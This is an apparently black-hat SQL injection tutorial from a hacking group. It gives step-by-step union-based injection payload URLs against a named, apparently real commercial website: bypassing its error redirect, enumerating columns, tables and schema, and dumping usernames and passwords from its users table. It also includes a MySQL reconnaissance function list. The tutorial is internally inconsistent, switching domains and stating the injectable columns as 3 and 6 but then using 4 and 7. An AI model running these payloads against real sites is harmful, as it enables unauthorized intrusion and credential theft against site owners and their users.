Sqli Union Based With NoRedirect

Less:-5. Sqli Union Based With NoRedirect

Tutorials by Team Hind And CyberSecuritySquad
Intro About Me:-
Name :-                           Navdeep Singh
Facebook_id=                      https://www.facebook.com/navdeep.dhukia.5
Facebook_offical Page(CSS)=       https://www.facebook.com/BlackHatHackers555
Facebook_offical Page(Team_Hind)  https://www.facebook.com/TeamHind/
Website:-                         http://www.securitykiller.org

Requirement:-
1. HackBar     (mozila adone)
2. NoRedirect  (mozila adone)

Step1. After Find It First Check This Site Valurnable Or Not......
i Have A site http://kpml.co.in/product.php?id=18

we will add single quoto(') after:- ?id=483
Like This http://kpml.co.in/product.php?id=18'
Hit Enter.

00PS Error After Put(') And Hit The Enter Than Its Redirect Me On A Error Page.
That Error page Say Me.

Error page Msg (lolz)
Some times LOOSERS AND FRUSTATED people comes here.....!!!

WARNING: Stop playing with this website.

Step4. Now I Am Angry After Read This msg So I Try Some Thing Diffrent. I use The NoRedirect addone For Bypasss The Error Page.

Step5. Now i Copy The Error page And Add This Error page Url On NoRedirect(addone)

Step6. After Bypass Redirect page And adding the Sigle Quoto(') its Work Normal Not Redirect Any page If I Add (').

Step7. Start The  Opration On Url, Now We Will Count total Number Of Columns In Information_schema.
               We Will Use Order By Query For The Count The Columns.
    Like This:-  http://kpml.co.in/product.php?id=18' order by 100-- +
        i am putting -- for comment out the query
        It is Showing error so.
now total number of columns is between 1 to 100 .
now i will decrease my columns no.

Step4. Now I Select Just 20th number of columns for shorting the site data.
Like this:-     http://bbss.com.pk/index.php?id=483 order by 20--
still error

Here Is Total no. Of Columns Is 11 Because at 12 there is Error

Step5. Now I Am Going To use Union Command For Checking Vulnerable Columns
Like This:-  http://kpml.co.in/product.php?id=-18' union select all 1,2,3,4,5,6,7,8,9,10,11--+


Now  Here  Vulnerable Columns is 3 and 6.

Now We Will Fetch All The Data Using Column Number 4 And 7.

Here Is Some Cmd For Fetch Data On Website:-

Variable/Function        Output
@@hostname    :            Current Hostname
@@tmpdir    :            Tept Directory
@@datadir    :            Data Directory
@@version    :            Version of DB
@@basedir    :            Base Directory
user()        :            Current User
database()    :            Current Database
version()    :            Version
schema()    :            current Database
UUID()        :            System UUID key
current_user()    :        Current User
current_user    :        Current User
system_user()    :        Current Sustem user
session_user()    :        Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl    :    Check if it have ssl or not       

Step6.  Now Finding The DataBase Name Or Version Name Using Vulnerable Columns.
Like This:-        http://kpml.co.in/product.php?id=-18' union select all 1,2,3,Database(),5,6,Version(),8,9,10,11--+

You See On Website Page:- Database Is= 'kpmlcoin_db'  ,    Version= '5.5.42-cll'


Step7. i Want tablenames only from database....so now we will set where condition...
Like This:-  http://kpml.co.in/product.php?id=-18' union select all 1,2,3,group_concat(table_name,0x3c62723e),5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()--+


Step8.I wana Need to Columns Name From Table(users)
Like this:- http://kpml.co.in/product.php?id=-18' union select all 1,2,3,group_concat(column_name,0x3c62723e),5,6,7,8,9,10,11 from information_schema.columns where table_name=0x7573657273--+
 We Got It The users Columns.

Step9. Now i fetch Juicy Data  That Is   name and Password
 like This:-http://kpml.co.in/product.php?id=-18' union select all 1,2,3,group_concat(UserName,0x3a,Password),5,6,7,8,9,10,11 from users--+

 Follow  Me On You Tube:-

 Less No.2:- sqli Union based With waf bypass
 Upload on Tom. 26-08-2015

 We Are:- | VIKYP | INDCYBERJOCKER |  In73ct0r d3vil | Navdeep Singh | CYBA TIGER | ANONFIGHTER | Mr.Hex | GHOSTF133T | VINEET RV | Hacker Ritz | SNIPER |

 Download This Txt File On You tube,Under This Video.

Keywords:-
Hacking By Navdeep Singh, Hackers Blog, Black Hat Hacker,
Hackers, hacking, Hacking News Blog, Free Hacking Study, Best Hacking Institute, Xss, Cross Site Scripting, Stored XSS, How To Hack, Hacking Book, Hacking Tools, Hacking Tutorials, Windows Hacking, Advance System Hacking, Website Hacking, Hacking News, Hackers News, The Hackers News
Mobile Hacking, Games Hacking, Android Hacking, Facebook Hacking, Google Hacking, Google Dorks, Email Hacking, Virus, Gmail Hacking, Whats App Hacking, Ip Changer, Ip Hide, tor, Cracking Tools, email hacking, Android Tools For Hacker, Mobile Game Hacking, Pc Game hacking, Facebook Trick, Clickjacking, Metasploit Tutorial, phising, phising attack, Keylogger Tutorial, Keylogger, KALI AND BACKTRACK, KALI AND BACKTRACK Tutorial, Web Hacking, Sqli, Sql Injection, Sqli Cheat Sheet, Sqli Admin Bypass, Wifi Hacking, Wifi Password Hacking